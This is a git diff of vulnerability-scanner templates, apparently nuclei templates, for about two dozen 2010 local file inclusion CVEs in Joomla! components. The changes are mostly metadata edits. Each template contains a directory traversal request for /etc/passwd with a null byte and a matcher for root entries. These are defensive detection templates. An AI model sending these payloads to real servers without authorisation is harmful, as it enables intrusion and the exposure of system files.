@@ info: name: Joomla! Component News Portal 1.5.x - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12077 - https://www.cvedetails.com/cve/CVE-2010-1312 + - http://secunia.com/advisories/39289 + - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1312 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1313.yaml b/cves/2010/CVE-2010-1313.yaml index 46a6e36549..8025cded39 100644 --- a/cves/2010/CVE-2010-1313.yaml +++ b/cves/2010/CVE-2010-1313.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12082 - https://www.cvedetails.com/cve/CVE-2010-1313 + - http://www.securityfocus.com/bid/39237 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1313 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1314.yaml b/cves/2010/CVE-2010-1314.yaml index 0d487cfbda..8801e334b1 100644 --- a/cves/2010/CVE-2010-1314.yaml +++ b/cves/2010/CVE-2010-1314.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Highslide 1.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12086 - https://www.cvedetails.com/cve/CVE-2010-1314 + - http://secunia.com/advisories/39359 + - http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1314 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1315.yaml b/cves/2010/CVE-2010-1315.yaml index 43663eef51..d17b7846a7 100644 --- a/cves/2010/CVE-2010-1315.yaml +++ b/cves/2010/CVE-2010-1315.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component webERPcustomer - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11999 - https://www.cvedetails.com/cve/CVE-2010-1315 + - http://secunia.com/advisories/39209 + - http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1315 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1340.yaml b/cves/2010/CVE-2010-1340.yaml index d369a9ddb3..999e6809a0 100644 --- a/cves/2010/CVE-2010-1340.yaml +++ b/cves/2010/CVE-2010-1340.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/33797 - https://www.cvedetails.com/cve/CVE-2010-1340 + - http://www.securityfocus.com/bid/38917 + - http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1340 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1345.yaml b/cves/2010/CVE-2010-1345.yaml index 814e4ab08a..82fda6212b 100644 --- a/cves/2010/CVE-2010-1345.yaml +++ b/cves/2010/CVE-2010-1345.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Cookex Agency CKForms - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/15453 - https://www.cvedetails.com/cve/CVE-2010-1345 + - http://www.exploit-db.com/exploits/11785 + - http://www.osvdb.org/63031 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1345 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1352.yaml b/cves/2010/CVE-2010-1352.yaml index 5dd77fa70f..9304332380 100644 --- a/cves/2010/CVE-2010-1352.yaml +++ b/cves/2010/CVE-2010-1352.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Juke Box 1.7 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12084 - https://www.cvedetails.com/cve/CVE-2010-1352 + - http://secunia.com/advisories/39357 + - http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1352 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1353.yaml b/cves/2010/CVE-2010-1353.yaml index cde20e6951..6d4b67ad6b 100644 --- a/cves/2010/CVE-2010-1353.yaml +++ b/cves/2010/CVE-2010-1353.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component LoginBox - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12068 - https://www.cvedetails.com/cve/CVE-2010-1353 + - http://www.securityfocus.com/bid/39212 + - http://www.vupen.com/english/advisories/2010/0808 + classification: + cve-id: CVE-2010-1353 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2010/CVE-2010-1354.yaml b/cves/2010/CVE-2010-1354.yaml index 2b37852cfc..b6435650fe 100644 --- a/cves/2010/CVE-2010-1354.yaml +++ b/cves/2010/CVE-2010-1354.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component VJDEO 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12102 - https://www.cvedetails.com/cve/CVE-2010-1354 + - http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt + - http://secunia.com/advisories/39296 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1354 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1461.yaml b/cves/2010/CVE-2010-1461.yaml index 13660c3ae8..0409f0399b 100644 --- a/cves/2010/CVE-2010-1461.yaml +++ b/cves/2010/CVE-2010-1461.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. - reference: | + description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + reference: - https://www.exploit-db.com/exploits/12232 - https://www.cvedetails.com/cve/CVE-2010-1461 - tags: cve,cve2010,joomla,lfi + - http://www.securityfocus.com/bid/39504 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1461 + tags: cve,cve2010,joomla,lfi,photo requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1469.yaml b/cves/2010/CVE-2010-1469.yaml index d06c195c18..b8370e009c 100644 --- a/cves/2010/CVE-2010-1469.yaml +++ b/cves/2010/CVE-2010-1469.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component JProject Manager 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: - https://www.exploit-db.com/exploits/12146 - https://www.cvedetails.com/cve/CVE-2010-1469 + - http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt + - http://www.exploit-db.com/exploits/12146 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1469 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1470.yaml b/cves/2010/CVE-2010-1470.yaml index bcb3e84703..bf37563f9b 100644 --- a/cves/2010/CVE-2010-1470.yaml +++ b/cves/2010/CVE-2010-1470.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component Web TV 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12166 - https://www.cvedetails.com/cve/CVE-2010-1470 + - http://secunia.com/advisories/39405 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1470 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1471.yaml b/cves/2010/CVE-2010-1471.yaml index b68e50d8b6..7234a24465 100644 --- a/cves/2010/CVE-2010-1471.yaml +++ b/cves/2010/CVE-2010-1471.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component Address Book 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12170 - https://www.cvedetails.com/cve/CVE-2010-1471 + - http://www.vupen.com/english/advisories/2010/0862 + classification: + cve-id: CVE-2010-1471 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1472.yaml b/cves/2010/CVE-2010-1472.yaml index 4294244baf..ae7f3c1f22 100644 --- a/cves/2010/CVE-2010-1472.yaml +++ b/cves/2010/CVE-2010-1472.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12167 - https://www.cvedetails.com/cve/CVE-2010-1472 + - http://secunia.com/advisories/39406 + - http://www.exploit-db.com/exploits/12167 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1472 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1473.yaml b/cves/2010/CVE-2010-1473.yaml index c2e7878067..02b9972d70 100644 --- a/cves/2010/CVE-2010-1473.yaml +++ b/cves/2010/CVE-2010-1473.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Advertising 0.25 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12171 - https://www.cvedetails.com/cve/CVE-2010-1473 + - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt + - http://secunia.com/advisories/39410 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1473 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1474.yaml b/cves/2010/CVE-2010-1474.yaml index bad1b8ef59..c7a14e2d70 100644 --- a/cves/2010/CVE-2010-1474.yaml +++ b/cves/2010/CVE-2010-1474.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12182 - https://www.cvedetails.com/cve/CVE-2010-1474 + - http://secunia.com/advisories/39388 + classification: + cve-id: CVE-2010-1474 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2010/CVE-2010-1475.yaml b/cves/2010/CVE-2010-1475.yaml index 44a2dd1650..bb3e999cac 100644 --- a/cves/2010/CVE-2010-1475.yaml +++ b/cves/2010/CVE-2010-1475.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12147 - https://www.cvedetails.com/cve/CVE-2010-1475 + - http://secunia.com/advisories/39285 + classification: + cve-id: CVE-2010-1475 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/24 diff --git a/cves/2010/CVE-2010-1476.yaml b/cves/2010/CVE-2010-1476.yaml index c1718acac9..156adbb01b 100644 --- a/cves/2010/CVE-2010-1476.yaml +++ b/cves/2010/CVE-2010-1476.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12150 - https://www.cvedetails.com/cve/CVE-2010-1476 + - http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt + - http://www.alphaplug.com/ + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1476 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1478.yaml b/cves/2010/CVE-2010-1478.yaml index 850f9aa938..e364de8273 100644 --- a/cves/2010/CVE-2010-1478.yaml +++ b/cves/2010/CVE-2010-1478.yaml @@ -4,24 +4,28 @@ info: name: Joomla! Component Jfeedback 1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: - https://www.exploit-db.com/exploits/12145 - https://www.cvedetails.com/cve/CVE-2010-1478 + - http://secunia.com/advisories/39262 + - http://www.securityfocus.com/bid/39390 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1478 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1491.yaml b/cves/2010/CVE-2010-1491.yaml index 865fd5f04f..bbda15aa41 100644 --- a/cves/2010/CVE-2010-1491.yaml +++ b/cves/2010/CVE-2010-1491.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12318 - https://www.cvedetails.com/cve/CVE-2010-1491 + - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt + - http://secunia.com/advisories/39533 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1491 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1494.yaml b/cves/2010/CVE-2010-1494.yaml index 290ff32940..db3b3fdb9f 100644 --- a/cves/2010/CVE-2010-1494.yaml +++ b/cves/2010/CVE-2010-1494.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12113 - https://www.cvedetails.com/cve/CVE-2010-1494 + - http://www.osvdb.org/63943 + - http://www.exploit-db.com/exploits/12113 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1494 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1495.yaml b/cves/2010/CVE-2010-1495.yaml index 3d3b10b6bb..d94775f64e 100644 --- a/cves/2010/CVE-2010-1495.yaml +++ b/cves/2010/CVE-2010-1495.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Matamko 1.01 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12286 - https://www.cvedetails.com/cve/CVE-2010-1495 + - http://www.vupen.com/english/advisories/2010/0929 + - http://packetstormsecurity.org/1004-exploits/joomlamatamko-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1495 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1531.yaml b/cves/2010/CVE-2010-1531.yaml index c118f123cd..d76282552f 100644 --- a/cves/2010/CVE-2010-1531.yaml +++ b/cves/2010/CVE-2010-1531.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component redSHOP 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12054 - https://www.cvedetails.com/cve/CVE-2010-1531 + - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt + - http://www.osvdb.org/63535 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1531 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1532.yaml b/cves/2010/CVE-2010-1532.yaml index 594664996b..5f2d0e4a18 100644 --- a/cves/2010/CVE-2010-1532.yaml +++ b/cves/2010/CVE-2010-1532.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12118 - https://www.cvedetails.com/cve/CVE-2010-1532 + - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt + - http://www.securityfocus.com/bid/39348 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1532 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - 